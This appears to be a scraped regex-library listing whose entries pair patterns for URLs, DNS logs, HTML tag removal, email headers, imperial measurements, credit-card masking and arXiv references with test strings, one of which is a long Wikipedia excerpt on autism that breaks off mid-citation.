6731 6249 1549128597544 6731 6967 1549128597611 6572 6967 1549128597678 6572 7707 1549128597745 6340 7707 1549128597812 6340 8119 1549128597879 6191 8119 1549128597946 6191 8360 1549128598013 5508 8360 1549128598080 5391 8360 1549128598147 5391 8575 1549128598214 5347 8575 1549128598281 5347 8721 1549128598348 5347 8854 1549128598415 5259 8854 1549128598482 5259 8903 1549128598549 5232 8903 1549128598616 5232 8866 1549128598683 5334 8866 1549128598750 5334 8768 1549128598817 5352 8768 1549128598884 5352 8718 1549128598951 5350 8718 1549128599018 5350 8665 1549128599085 5294 8665 1549128599152 5294 8619 1549128599219 5291 8619 1549128599286 5277 8619 1549128599353 5277 8567 1549128599420 5544 8567 1549128599487 5544 8553 1549128599554 5544 8509 1549128599621 5473 8509 1549128599688 5473 8432 1549128599755 5449 8432 1549128599822 5449 8311 1549128599889 5442 8311 1549128599956 5442 8134 1549128600023 5467 8134 1549128600090 5467 7923 1549128600157 6072 7923 1549128600224 6072 7588 1549128600291 6516 7588 1549128600358 6516 7271 1549128600425 6830 7271 1549128600492 6965 7271 1549128600559 6965 6554 1549128600626 7080 6554 1549128600693 7080 6408 1549128600760 7080 6124 1549128600827 7213 6124 1549128600894 7213 5895 1549128600961 7269 5895 1549128601028 7269 5890 1549128601095 7264 5890 1549128601162 7264 6087 1549128601229 7243 6087 1549128601296 7243 6183 1549128601363 7140 6183 1549128601430 7140 6148 1549128601497 7078 6148 1549128601564 7050 6148 1549128601631 7050 6120 1549128601698 7038 6120 1549128601765 7038 6102 1549128601832 7045 6102 1549128601899 7045 6050 1549128601966 7042 6050 1549128602033 7042 6041 1549128602100 7042 6117 1549128602167 7042 6117 1549128602234 7042 6229 1549128602301 7045 6229 1549128602368 7045 6174 1549128602435 6981 6174 1549128602502 6981 6223 1549128602569 6917 6223 1549128602636 6917 6193 1549128602703 6777 6193 1549128602770 6642 6193 1549128602837 6642 6710 1549128602904 6447 6710 1549128602971 6447 7540 1549128603038 6447 8045 1549128603105 6258 8045 1549128603172 6258 8280 1549128603239 5656 8280 1549128603306 5656 8516 1549128603373 5411 8516 1549128603440 5411 8661 1549128603507 5363 8661 1549128603574 5363 8819 1549128603641 5289 8819 1549128603708 5289 8888 1549128603775 5216 8888 1549128603842 5216 8881 1549128603909 5285 8881 1549128603976 5367 8881 1549128604043 5367 8832 1549128604110 5374 8832 1549128604177 5374 8774 1549128604244 5374 8731 1549128604311 5311 8731 1549128604378 5311 8657 1549128604445 5285 8657 1549128604512 5285 8629 1549128604579 5262 8629 1549128604646 5262 8604 1549128604713 5413 8604 1549128604780 5413 8569 1549128604847 5586 8569 1549128604914 5586 8523 1549128604981 5364 8523 1549128605048 5364 8398 1549128605115 5448 8398 1549128605182 5402 8398 1549128605249 5402 8256 1549128605316 5460 8256 1549128605383 5460 8009 1549128605450 5460 7761 1549128605517 5726 7761 1549128605584 5726 7544 1549128605651 6375 7544 1549128605718 6375 7275 1549128605785 6752 7275 1549128605852 6752 6578 1549128605919 6983 6578 1549128605986 6983 6417 1549128606053 7118 6417 1549128606120 7118 6065 1549128606187 7254 6065 1549128606254 7254 5873 1549128606321 7336 5873 1549128606388 7395 5873 1549128606455 7395 5877 1549128606522 7347 5877 1549128606589 7347 6039 1549128606656 7347 6118 1549128606723 7330 6118 1549128606790 7330 6113 1549128606857 7267 6113 1549128606924 7267 6092 1549128606991 7181 6092 1549128607058 7181 6070 1549128607125 7111 6070 1549128607192 7111 6024 1549128607259 7009 6024 1549128607326 7009 6111 1549128607393 7016 6111 1549128607460 6977 6111 1549128607527 6977 6225 1549128607594 6950 6225 1549128607661 6950 6103 1549128607728 6950 6127 1549128607795 6898 6127 1549128607862 6898 6135 1549128607929 6807 6135 1549128607996 6807 6167 1549128608063 6725 6167 1549128608130 6725 6966 1549128608197 6566 6966 1549128608264 6566 7692 1549128608331 6369 7692 1549128608398 6369 8116 1549128608465 6192 8116 1549128608532 6192 8302 1549128608599 5574 8302 1549128608666 5413 8302 1549128608733 5413 8505 1549128608800 5337 8505 1549128608867 5337 8667 1549128608934 5337 8776 1549128609001 5268 8776 1549128609068 5268 8830 1549128609135 5218 8830 1549128609202 5218 8871 1549128609269 5330 8871 1549128609336 5330 8783 1549128609403 5369 8783 1549128609470 5369 8712 1549128609537 5360 8712 1549128609604 5360 8679 1549128609671 5298 8679 1549128609738 5298 8638 1549128609805 5288 8638 1549128609872 5262 8638 1549128609939 5262 8613 1549128610006 5573 8613 1549128610073 5573 8626 1549128610140 5573 8593 1549128610207 5439 8593 1549128610274 5439 8513 1549128610341 5408 8513 1549128610408 5408 8324 1549128610475 5410 8324 1549128610542 5410 8211 1549128610609 5430 8211 1549128610676 5430 8056 1549128610743 5721 8056 1549128610810 5721 7770 1549128610877 6209 7770 1549128610944 6209 7528 1549128611011 6586 7528 1549128611078 6801 7528 1549128611145 6801 7237 1549128611212 7021 7237 1549128611279 7021 6528 1549128611346 7021 6378 1549128611413 7148 6378 1549128611480 7148 6032 1549128611547 7191 6032 1549128611614 7191 5852 1549128611681 7240 5852 1549128611748 7240 5893 1549128611815 7181 5893 1549128611882 7181 6109 1549128611949 7083 6109 1549128612016 7083 6126 1549128612083 7011 6126 1549128612150 7011 6102 1549128612217 6969 6102 1549128612284 6932 6102 1549128612351 6932 6094 1549128612418 6911 6094 1549128612485 6911 6061 1549128612552 6911 6026 1549128612619 6923 6026 1549128612686 6923 6184 1549128612753 6947 6184 1549128612820 6947 6236 1549128612887 6952 6236 1549128612954 6952 6120 1549128613021 6939 6120 1549128613088 6939 6221 1549128613155 6906 6221 1549128613222 6906 6216
Excel to DB
2019-03-20T20:20:45.000Z
## X3D SFBool X3D SFBool is a single-field boolean value. * http://www.web3d.org/specifications/X3dRegularExpressions.html#SFBool
^\s*(true|false)\s*$
false
X3D SFBool
2018-08-16T23:46:05.000Z
(^https?\:\/\/|(\/|\?).*$)
http://example.org http://www.example.org https://example.org https://example.org/some-stuff/or-other example.org?some-stuff=foo&other=bar example.org/?some-stuff=foo&other=bar
Clean website URL
2019-10-31T09:33:55.000Z
(?P<ip_class>A{1,4}) (?P<ip>[a-f,A-Z,0-9,:,\.]+) (?P<ttl>\d+)(?P<comma_space>, )?
A 10.95.151.82 5, A 10.95.151.81 5, AAAA fd88:3be1:fee4:8c5d::2c 5, AAAA fd88:3be1:fee4:8c5c::2a 5
log dns valid response
2019-01-03T14:02:17.000Z
for ike testing phase 4
^(https?\:\/\/|[a-zA-Z0-9]?)([a-zA-Z0-9\-]+\.host\.[a-zA-Z0-9]+$|host\.[a-zA-Z0-9]+$)
#### should MATCH all of these: http://www.host.com https://www.host.com https://www.host.com http://host.com http://www.host.tv https://www.host.live host.com www.host.com http://sub-services.host.com sub-services.host.com g.host.com gg.host.com gggg.host.com something-services.host.com #### should NOT MATCH all of these: http://www.something.com http://www.host-something.com http://www.host.something-com http://www.hosts.com https://www.host https://www.host.live.com http://.host.com http://www.host.tv.com something.com .host.com www.com
http base url for host 'host'
2020-06-08T01:28:45.000Z
Remove HTML tags from a string using JavaScript and RegEx
(<([^>]+)>)
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Document</title> </head> <body> <div> Sono un div <p>Sono un paragrafo </p> <p>Altro paragrafo </p> <span>Uno span </span> <a href="">Un link </a> <button>Un bottone </button> </div> </body> </html>
Remove HTML tags from a string using JavaScript and RegEx
2022-05-10T09:07:50.000Z
^(?=.*\bsubject\b)(?=.([\s\S]*)urgent)(?=.([\s\S]*)yahoo\.com).*$
User-Agent: Microsoft-MacOutlook/10.17.1.190326 Date: Wed, 05 Jun 2019 15:04:21 +0800 Subject: FW: DR OKE DANLDAI PLEASEURGENT From: Dennis Chng <[email protected]> To: helpdesk <[email protected]>, Raynor Tan <[email protected]> Message-ID: <[email protected]> Thread-Topic: DR OKE DANLDAI PLEASE URGENT References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Mime-version: 1.0
IQ-1
2019-06-10T01:20:17.000Z
^(\d+')?(?:(?<=')\s*-\s*)?(\d+(?:\s*\d+\/\d+|\.\d+)?")$
111' - 12.01"
imperial string
2015-04-30T12:32:18.000Z
(?<=\d{6})(\d+)(?=\d{4})
4548812049400004 5229782641993099 345678000000007 6362970000457013
Mask credit card
2016-01-14T11:11:16.000Z
( arxiv\\s*=\\s* | arxiv\\.org/(abs/)? | arxiv:\\s? )
{{Hatnote|This article is about the classic autistic disorder; some writers use the word ''autism'' when referring to the range of disorders on the [[autism spectrum]] or to the various [[pervasive developmental disorder]]s.<ref name=Caronna/>}} {{pp-semi-indef}} {{pp-move-indef}} {{bots|deny=Monkbot}} <!-- keep Monkbot from visiting this page --> {{Use dmy dates|date=June 2015}} <!-- NOTES: 1) Please follow the Wikipedia style guidelines for editing medical articles [[WP:MEDMOS]], and medical referencing standards at [[WP:MEDRS]]. 2) Use <ref> for explicitly cited references. 3) Reference anything you put here with notable references, as this subject tends to attract a lot of controversy.--> {{Infobox disease | Name = Autism | Image = Autism-stacking-cans 2nd edit.jpg | Alt = Young red-haired boy facing away from camera, stacking a seventh can atop a column of six food cans on the kitchen floor. An open pantry contains many more cans. | Caption = Repetitively stacking or lining up objects is associated with autism. | field = [[Psychiatry]] | DiseasesDB = 1142 | ICD10 = {{ICD10|F|84|0|f|80}} | ICD9 = 299.00 | ICDO = | OMIM = 209850 | MedlinePlus = 001526 | eMedicineSubj = med | eMedicineTopic = 3202 | eMedicine_mult = {{eMedicine2|ped|180}} | MeshID = D001321 | GeneReviewsNBK = NBK1442 | GeneReviewsName = Autism overview }} <!-- Definition and symptoms --> '''Autism''' is a [[neurodevelopmental disorder]] characterized by impaired [[Interpersonal relationship|social interaction]], [[language acquisition|verbal]] and [[non-verbal communication]], and restricted and repetitive behavior. Parents usually notice signs in the first two years of their child's life.<ref name=CCD/> These signs often develop gradually, though some children with autism reach their [[developmental milestones]] at a normal pace and then [[Regressive autism|regress]].<ref name=Stefanatos/> The [[Diagnostic and Statistical Manual of Mental Disorders|diagnostic criteria]] require that symptoms become apparent in early childhood, typically before age three.<ref name=DSM5>{{vcite book | title = Diagnostic and Statistical Manual of Mental Disorders, Fifth Edition | chapter = Autism Spectrum Disorder, 299.00 (F84.0) | editor = American Psychiatric Association | year = 2013 | publisher = American Psychiatric Publishing | pagex = 50–59}}</ref> <!-- Causes and diagnosis --> While autism is highly heritable, researchers suspect both environmental and genetic factors as causes.<ref>{{cite journal |author=Chaste P, Leboyer M |title=Autism risk factors: genes, environment, and gene-environment interactions |journal=Dialogues in Clinical Neuroscience |volume=14 |pages=281–92 |year=2012 |pmid=23226953 |pmc=3513682 }}</ref> In rare cases, autism is strongly associated with [[Teratology|agents that cause birth defects]].<ref name=Arndt/> [[Controversies in autism|Controversies]] surround other proposed environmental [[Causes of autism|causes]];<ref name=Rutter/> for example, the [[MMR vaccine controversy|vaccine hypotheses]] have been disproven. Autism affects information processing in the [[Human brain|brain]] by altering how [[nerve cell]]s and their [[synapse]]s connect and organize; how this occurs is not well understood.<ref name="Levy" /> It is one of three recognized disorders in the [[autism spectrum]] (ASDs), the other two being [[Asperger syndrome]], which lacks delays in cognitive development and language, and [[PDD-NOS|pervasive developmental disorder, not otherwise specified]] (commonly abbreviated as PDD-NOS), which is diagnosed when the full set of criteria for autism or Asperger syndrome are not met.<ref name="Johnson" /> <!-- Treatment --> Early speech or [[Early intensive behavioral intervention|behavioral interventions]] can help children with autism gain self-care, social, and communication skills.<ref name=CCD/> Although there is no known cure,<ref name=CCD/> there have been reported cases of children who recovered.<ref name=Helt/> Not many children with autism live independently after reaching adulthood, though some become successful.<ref name="Howlin">{{cite journal | vauthors = Howlin P, Goode S, Hutton J, Rutter M | title = Adult outcome for children with autism | journal = J Child Psychol Psychiatry | volume = 45 | issue = 2 | pages = 212–29 | year = 2004 | pmid = 14982237 | doi = 10.1111/j.1469-7610.2004.00215.x }}</ref> An [[Sociological and cultural aspects of autism|autistic culture]] has developed, with some individuals seeking a cure and others believing autism should be [[Autism rights movement|accepted as a difference and not treated as a disorder]].<ref name=Silverman/> <!-- Epidemiology --> Globally, autism is estimated to affect 21.7 million people as of 2013.<ref name="Collab">{{cite journal |author = Global Burden of Disease Study 2013 Collaborators |title=Global, regional, and national incidence, prevalence, and years lived with disability for 301 acute and chronic diseases and injuries in 188 countries, 1990-2013: a systematic analysis for the Global Burden of Disease Study 2013.|journal=Lancet|year = 2015|pmid=26063472 |doi=10.1016/S0140-6736(15)60692-4}}</ref> As of 2010, the number of people affected is estimated at about 1–2 per 1,000 worldwide. It occurs four to five times more often in boys than girls. About 1.5% of children in the United States (one in 68) are diagnosed with ASD {{as of|2014|lc=y}}, a 30% increase from one in 88 in 2012.<ref name="ASD Data and Statistics">{{cite web |url = http://www.cdc.gov/ncbddd/autism/data.html |title = ASD Data and Statistics |website = CDC.gov |accessdate= 5 April 2014 |archiveurl = http://web.archive.org/web/20140418153648/http://www.cdc.gov/ncbddd/autism/data.html |archivedate = 18 April 2014 }}</ref><ref name="MMWR2012">{{cite journal | vauthors = | title = Prevalence of autism spectrum disorders&nbsp;— autism and developmental disabilities monitoring network, 14 sites, United States, 2008 | journal = MMWR Surveill Summ | volume = 61 | issue = 3 | pages = 1–19 | year = 2012 | pmid = 22456193 | url = http://www.cdc.gov/mmwr/preview/mmwrhtml/ss6103a1.htm | archivedate = 25 March 2014 | archiveurl = http://web.archive.org/web/20140325235639/http://www.cdc.gov/mmwr/preview/mmwrhtml/ss6103a1.htm }}</ref><ref name="NHSR65">{{cite journal | vauthors = Blumberg SJ, Bramlett MD, Kogan MD, Schieve LA, Jones JR, Lu MC | title = Changes in prevalence of parent-reported autism spectrum disorder in school-aged U.S. children: 2007 to 2011–2012 | journal = Natl Health Stat Report | volume = | issue = 65 | pages = 1–11 | year = 2013 | pmid = 24988818 | url = http://www.cdc.gov/nchs/data/nhsr/nhsr065.pdf | archiveurl = http://www.webcitation.org/6JoG0uE7r|archivedate=21 September 2013 }}</ref> The rate of autism among adults aged 18 years and over in the United Kingdom is 1.1%.<ref name=NHSEstimating/> The number of people diagnosed has been increasing dramatically since the 1980s, partly due to changes in diagnostic practice and government-subsidized financial incentives for named diagnoses;<ref name="NHSR65"/> the question of whether actual rates have increased is unresolved.<ref name=Newschaffer/> ==Characteristics== Autism is a highly variable [[neurodevelopmental disorder]]<ref name=Geschwind/> that first appears during infancy or childhood, and generally follows a steady course without [[Remission (medicine)|remission]].<ref name=ICD-10-F84.0/> People with autism may be severely impaired in some respects but normal, or even superior, in others.<ref>{{vcite book|title = Biopsychology|author= Pinel JPG|publisher = Pearson|year = 2011|isbn = 978-0-205-03099-6|location = Boston, Massachusetts|page = 235}}</ref> Overt symptoms gradually begin after the age of six months, become established by age two or three years,<ref>{{cite journal | vauthors = Rogers SJ | title = What are infant siblings teaching us about autism in infancy? | journal = Autism Res | volume = 2 | issue = 3 | pages = 125–37 | year = 2009 | pmid = 19582867 | pmc = 2791538 | doi = 10.1002/aur.81 }}</ref> and tend to continue through adulthood, although often in more muted form.<ref name=Rapin/> It is distinguished not by a single symptom, but by a characteristic triad of symptoms: impairments in social interaction; impairments in communication; and restricted interests and repetitive behavior. Other aspects, such as atypical eating, are also common but are not essential for diagnosis.<ref name=Filipek/> Autism's individual symptoms occur in the general population and appear not to associate highly, without a sharp line separating pathologically severe from common traits.<ref name=London/> ===Social development=== Social deficits distinguish autism and the related [[autism spectrum disorder]]s (ASD; see [[#Classification|Classification]]) from other developmental disorders.<ref name=Rapin/> People with autism have social impairments and often lack the intuition about others that many people take for granted. Noted autistic [[Temple Grandin]] described her inability to understand the [[social communication]] of [[neurotypical]]s, or people with normal [[neural development]], as leaving her feeling "like an anthropologist on Mars".<ref>{{vcite book |title=[[An Anthropologist on Mars]]: Seven Paradoxical Tales |author=[[Oliver Sacks|Sacks O]] |publisher=Knopf |year=1995 |isbn=978-0-679-43785-7 }}</ref> Unusual social development becomes apparent early in childhood.<!-- ref name=Volkmar/ --> Autistic infants show less attention to social stimuli, smile and look at others less often, and respond less to their own name. Autistic toddlers differ more strikingly from [[social norms]]; for example, they have less [[eye contact]] and [[turn-taking]], and do not have the ability to use simple movements to express themselves, such as pointing at things.<ref name=Volkmar/> Three- to five-year-old children with autism are less likely to exhibit social understanding, approach others spontaneously, imitate and respond to emotions, communicate nonverbally, and take turns with others. However, they do form [[Attachment (psychology)|attachments]] to their primary caregivers.<ref>{{cite journal | vauthors = Sigman M, Dijamco A, Gratier M, Rozga A | title = Early detection of core deficits in autism | journal = Ment Retard Dev Disabil Res Rev | volume = 10 | issue = 4 | pages = 221–33 | year = 2004 | pmid = 15666338 | doi = 10.1002/mrdd.20046 }}</ref> Most childen with autism display moderately less [[Attachment in children#Secure attachment|attachment security]] than neurotypical children, although this difference disappears in children with higher mental development or less severe ASD.<ref>{{cite journal | vauthors = Rutgers AH, Bakermans-Kranenburg MJ, van Ijzendoorn MH, van Berckelaer-Onnes IA | title = Autism and attachment: a meta-analytic review | journal = J Child Psychol Psychiatry | volume = 45 | issue = 6 | pages = 1123–34 | year = 2004 | pmid = 15257669 | doi = 10.1111/j.1469-7610.2004.t01-1-00305.x }}</ref> Older children and adults with ASD [[Face perception#Face perception in individuals with autism|perform worse on tests of face and emotion recognition]].<ref name="Sigman">{{cite journal | vauthors = Sigman M, Spence SJ, Wang AT | title = Autism from developmental and neuropsychological perspectives | journal = Annu Rev Clin Psychol | volume = 2 | pages = 327–55 | year = 2006 | pmid = 17716073 | doi = 10.1146/annurev.clinpsy.2.022305.095210 }}</ref> Children with high-functioning autism suffer from more intense and frequent loneliness compared to non-autistic peers, despite the common belief that children with autism prefer to be alone. Making and maintaining friendships often proves to be difficult for those with autism. For them, the quality of friendships, not the number of friends, predicts how lonely they feel. Functional friendships, such as those resulting in invitations to parties, may affect the quality of life more deeply.<ref name=Burgess/> There are many anecdotal reports, but few systematic studies, of aggression and violence in individuals with ASD. The limited data suggest that, in children with intellectual disability, autism is associated with aggression, destruction of property, and [[tantrum]]s.<ref>{{cite journal | vauthors = Matson JL, Nebel-Schwalm M | title = Assessing challenging behaviors in children with autism spectrum disorders: A review | journal = Research in Developmental Disabilities | volume = 28 | issue = 6 | pages = 567–79 | date = November 2007 | pmid = 16973329 | doi = 10.1016/j.ridd.2006.08.001 }}</ref> ===Communication=== About a third to a half of individuals with autism do not develop enough natural speech to meet their daily communication needs.<ref>{{cite journal | vauthors = Noens I, van Berckelaer-Onnes I, Verpoorten R, van Duijn G | title = The ComFor: an instrument for the indication of augmentative communication in people with autism and intellectual disability | journal = J Intellect Disabil Res | volume = 50 | issue = 9 | pages = 621–32 | year = 2006 | pmid = 16901289 | doi = 10.1111/j.1365-2788.2006.00807.x }}</ref> Differences in communication may be present from the first year of life, and may include delayed onset of [[babbling]], unusual gestures, diminished responsiveness, and vocal patterns that are not synchronized with the caregiver. In the second and third years, children with autism have less frequent and less diverse babbling, consonants, words, and word combinations; their gestures are less often integrated with words. Children with autism are less likely to make requests or share experiences, and are more likely to simply repeat others' words ([[echolalia]])<ref name=Landa/><ref name=Tager-Flusberg/> or [[Pronoun reversal|reverse pronouns]].<ref name=Kanner1943/> [[Joint attention]] seems to be necessary for functional speech, and deficits in joint attention seem to distinguish infants with ASD:<ref name="Johnson">{{cite journal | vauthors = Johnson CP, Myers SM | title = Identification and evaluation of children with autism spectrum disorders | journal = Pediatrics | volume = 120 | issue = 5 | pages = 1183–215 | year = 2007 | pmid = 17967920 | doi = 10.1542/peds.2007-2361 | url = http://pediatrics.aappublications.org/cgi/content/full/120/5/1183 | archiveurl = http://web.archive.org/web/20090208013449/http://pediatrics.aappublications.org:80/cgi/content/full/120/5/1183 | archivedate = 8 February 2009 }}</ref> for example, they may look at a pointing hand instead of the pointed-at object,<ref name=Volkmar/><ref name=Tager-Flusberg/> and they consistently fail to point at objects in order to comment on or share an experience.<ref name=Johnson/> Children with autism may have difficulty with imaginative play and with developing symbols into language.<ref name="Landa">{{cite journal | vauthors = Landa R | title = Early communication development and intervention for children with autism | journal = Ment Retard Dev Disabil Res Rev | volume = 13 | issue = 1 | pages = 16–25 | year = 2007 | pmid = 17326115 | doi = 10.1002/mrdd.20134 }}</ref><ref name="Tager-Flusberg">{{cite journal | vauthors = Tager-Flusberg H, Caronna E | title = Language disorders: autism and other pervasive developmental disorders | journal = Pediatr Clin North Am | volume = 54 | issue = 3 | pages = 469–81 | year = 2007 | pmid = 17543905 | doi = 10.1016/j.pcl.2007.02.011 }}</ref> In a pair of studies, high-functioning children with autism aged 8–15 performed equally well as, and adults better than, individually matched controls at basic language tasks involving vocabulary and spelling. Both autistic groups performed worse than controls at complex language tasks such as figurative language, comprehension and inference. As people are often sized up initially from their basic language skills, these studies suggest that people speaking to autistic individuals are more likely to overestimate what their audience comprehends.<ref name=Williams/> ===Repetitive behavior=== Autistic individuals display many forms of repetitive or restricted behavior, which the Repetitive Behavior Scale-Revised (RBS-R)<ref name=Lam-Aman/> categorizes as follows. [[File:Autistic-sweetiepie-boy-with-ducksinarow.jpg|thumb|alt=Young boy asleep on a bed, facing the camera, with only the head visible and the body off-camera. On the bed behind the boy's head is a dozen or so toys carefully arranged in a line.|A young boy with autism who has arranged his toys in a row]] * '''[[Stereotypy]]''' is repetitive movement, such as hand flapping, head rolling, or body rocking. * '''[[Compulsive behavior]]''' is intended and appears to follow rules, such as arranging objects in stacks or lines. * '''Sameness''' is resistance to change; for example, insisting that the furniture not be moved or refusing to be interrupted. * '''[[Ritual#Psychology|Ritualistic behavior]]''' involves an unvarying pattern of daily activities, such as an unchanging menu or a dressing ritual. This is closely associated with sameness and an independent validation has suggested combining the two factors.<ref name="Lam-Aman">{{cite journal | vauthors = Lam KS, Aman MG | title = The Repetitive Behavior Scale-Revised: independent validation in individuals with autism spectrum disorders | journal = J Autism Dev Disord | volume = 37 | issue = 5 | pages = 855–66 | year = 2007 | pmid = 17048092 | doi = 10.1007/s10803-006-0213-z }}</ref> * '''Restricted behavior''' is limited in focus, interest, or activity, such as preoccupation with a single television program, toy or game. * '''[[Self-injury]]''' includes movements that injure or can injure the person, such as eye-poking, [[Dermatillomania|skin-picking]], hand-biting and head-banging.<ref name=Johnson/> No single repetitive or self-injurious behavior seems to be specific to autism, but only autism appears to have an elevated pattern of occurrence and severity of these behaviors.<ref>{{cite journal | vauthors = Bodfish JW, Symons FJ, Parker DE, Lewis MH | title = Varieties of repetitive behavior in autism: comparisons to mental retardation | journal = J Autism Dev Disord | volume = 30 | issue = 3 | pages = 237–43 | year = 2000 | pmid = 11055459 | doi = 10.1023/A:1005596502855 }}</ref> ===Other symptoms=== Autistic individuals may have symptoms that are independent of the diagnosis, but that can affect the individual or the family.<ref name="Filipek">{{cite journal | vauthors = Filipek PA, Accardo PJ, Baranek GT, Cook EH, Dawson G, Gordon B, Gravel JS, Johnson CP, Kallen RJ, Levy SE, Minshew NJ, Ozonoff S, Prizant BM, Rapin I, Rogers SJ, Stone WL, Teplin S, Tuchman RF, Volkmar FR | title = The screening and diagnosis of autistic spectrum disorders | journal = J Autism Dev Disord | volume = 29 | issue = 6 | pages = 439–84 | year = 1999 | pmid = 10638459 | doi = 10.1023/A:1021943802493 | author. = }} This paper represents a consensus of representatives from nine professional and four parent organizations in the US.</ref> An estimated 0.5% to 10% of individuals with ASD show unusual abilities, ranging from [[splinter skill]]s such as the memorization of trivia to the extraordinarily rare talents of prodigious [[Savant syndrome|autistic savants]].<ref>{{cite journal | vauthors = Treffert DA | title = The savant syndrome: an extraordinary condition. A synopsis: past, present, future | journal = Philosophical Transactions of the Royal Society B | volume = 364 | issue = 1522 | pages = 1351–7 | year = 2009 | pmid = 19528017 | pmc = 2677584 | doi = 10.1098/rstb.2008.0326 | url = http://rstb.royalsocietypublishing.org/content/364/1522/1351.full | laysummary = https://www.wisconsinmedicalsociety.org/professional/savant-syndrome/savant-syndrome-overview/ | laysource = Wisconsin Medical Society }}</ref> Many individuals with ASD show superior skills in perception and attention, relative to the general population.<ref>{{cite journal | vauthors = Plaisted Grant K, Davis G | title = Perception and apperception in autism: rejecting the inverse assumption | journal = Philosophical Transactions of the Royal Society B | volume = 364 | issue = 1522 | pages = 1393–8 | year = 2009 | pmid = 19528022 | pmc = 2677593 | doi = 10.1098/rstb.2009.0001 | url = http://rstb.royalsocietypublishing.org/content/364/1522/1393.full }}</ref> [[Sensory system|Sensory]] abnormalities are found in over 90% of those with autism, and are considered core features by some,<ref name="Geschwind-2009">{{cite journal | vauthors = Geschwind DH | title = Advances in autism | journal = Annu Rev Med | volume = 60 | pages = 367–80 | year = 2009 | pmid = 19630577 | pmc = 3645857 | doi = 10.1146/annurev.med.60.053107.121225 }}</ref> although there is no good evidence that sensory symptoms differentiate autism from other developmental disorders.<ref>{{cite journal | vauthors = Rogers SJ, Ozonoff S | title = Annotation: what do we know about sensory dysfunction in autism? A critical review of the empirical evidence | journal = J Child Psychol Psychiatry | volume = 46 | issue = 12 | pages = 1255–68 | year = 2005 | pmid = 16313426 | doi = 10.1111/j.1469-7610.2005.01431.x }}</ref> Differences are greater for under-responsivity (for example, walking into things) than for over-responsivity (for example, distress from loud noises) or for sensation seeking (for example, rhythmic movements).<ref>{{cite journal | vauthors = Ben-Sasson A, Hen L, Fluss R, Cermak SA, Engel-Yeger B, Gal E | title = A meta-analysis of sensory modulation symptoms in individuals with autism spectrum disorders | journal = J Autism Dev Disord | volume = 39 | issue = 1 | pages = 1–11 | year = 2009 | pmid = 18512135 | doi = 10.1007/s10803-008-0593-3 }}</ref> An estimated 60%–80% of autistic people have motor signs that include [[poor muscle tone]], [[Apraxia|poor motor planning]], and [[toe walking]];<ref name=Geschwind-2009/> deficits in motor coordination are pervasive across ASD and are greater in autism proper.<ref>{{cite journal | vauthors = Fournier KA, Hass CJ, Naik SK, Lodha N, Cauraugh JH | title = Motor coordination in autism spectrum disorders: a synthesis and meta-analysis | journal = J Autism Dev Disord | volume = | issue = | year = 2010 | pmid = 20195737 | doi = 10.1007/s10803-010-0981-3 }}</ref> Unusual eating behavior occurs in about three-quarters of children with ASD, to the extent that it was formerly a diagnostic indicator. Selectivity is the most common problem, although eating rituals and food refusal also occur;<ref name="Dominick">{{cite journal | vauthors = Dominick KC, Davis NO, Lainhart J, Tager-Flusberg H, Folstein S | title = Atypical behaviors in children with autism and children with a history of language impairment | journal = Res Dev Disabil | volume = 28 | issue = 2 | pages = 145–62 | year = 2007 | pmid = 16581226 | doi = 10.1016/j.ridd.2006.02.003 }}</ref> this does not appear to result in [[malnutrition]]. Although some children with autism also have [[gastrointestinal]] symptoms, there is a lack of published rigorous data to support the theory that children with autism have more or different gastrointestinal symptoms than usual;<ref>{{cite journal | vauthors = Erickson CA, Stigler KA, Corkins MR, Posey DJ, Fitzgerald JF, McDougle CJ | title = Gastrointestinal factors in autistic disorder: a critical review | journal = J Autism Dev Disord | volume = 35 | issue = 6 | pages = 713–27 | year = 2005 | pmid = 16267642 | doi = 10.1007/s10803-005-0019-4 }}</ref> studies report conflicting results, and the relationship between gastrointestinal problems and ASD is unclear.<ref>{{cite journal | vauthors = Buie T, Campbell DB, Fuchs GJ, Furuta GT, Levy J, Vandewater J, Whitaker AH, Atkins D, Bauman ML, Beaudet AL, Carr EG, Gershon MD, Hyman SL, Jirapinyo P, Jyonouchi H, Kooros K, Kushak R, Levitt P, Levy SE, Lewis JD, Murray KF, Natowicz MR, Sabra A, Wershil BK, Weston SC, Zeltzer L, Winter H | title = Evaluation, diagnosis, and treatment of gastrointestinal disorders in individuals with ASDs: a consensus report | journal = Pediatrics | volume = 125 | issue = Suppl 1 | pages = S1–18 | year = 2010 | pmid = 20048083 | doi = 10.1542/peds.2009-1878C | url = http://pediatrics.aappublications.org/cgi/content/full/125/Supplement_1/S1 | author. = | archiveurl = http://web.archive.org/web/20100706035348/http://pediatrics.aappublications.org/cgi/content/full/125/Supplement_1/S1 | archivedate = 6 July 2010 }}</ref> Parents of children with ASD have higher levels of [[stress (psychological)|stress]].<ref name="Volkmar">{{vcite book|authors=Volkmar FR, Paul R, Rogers SJ, Pelphrey KA|title=Handbook of Autism and Pervasive Developmental Disorders, Assessment, Interventions, and Policy|publisher=[[John Wiley & Sons]]|isbn=1-118-28220-5|year=2014|page=301|accessdate=24 December 2014|url=https://books.google.com/books?id=4yzqAgAAQBAJ&pg=PT301}}</ref> Siblings of children with ASD report greater admiration of and less conflict with the affected sibling than siblings of unaffected children and were similar to siblings of children with [[Down syndrome]] in these aspects of the sibling relationship. However, they reported lower levels of closeness and intimacy than siblings of children with [[Down syndrome]]; siblings of individuals with ASD have greater risk of negative well-being and poorer sibling relationships as adults.<ref>{{cite journal | vauthors = Orsmond GI, Seltzer MM | title = Siblings of individuals with autism spectrum disorders across the life course | journal = Ment Retard Dev Disabil Res Rev | volume = 13 | issue = 4 | pages = 313–20 | year = 2007 | pmid = 17979200 | doi = 10.1002/mrdd.20171 | url = http://www.waisman.wisc.edu/family/pubs/Autism/2007%20siblings_autism_life-course.pdf | format = PDF | archiveurl = http://web.archive.org/web/20130530100939/http://www.waisman.wisc.edu/family/pubs/Autism/2007%20siblings_autism_life-course.pdf | archivedate = 30 May 2013 }}</ref> ==Causes== {{main|Causes of autism}} It has long been presumed that there is a common cause at the genetic, cognitive, and neural levels for autism's characteristic triad of symptoms.<ref name=Fractionable/> However, there is increasing suspicion that autism is instead a complex disorder whose core aspects have distinct causes that often co-occur.<ref name="Fractionable">{{cite journal | vauthors = Happé F, Ronald A | title = The 'fractionable autism triad': a review of evidence from behavioural, genetic, cognitive and neural research | journal = [[Neuropsychol Rev]] | volume = 18 | issue = 4 | 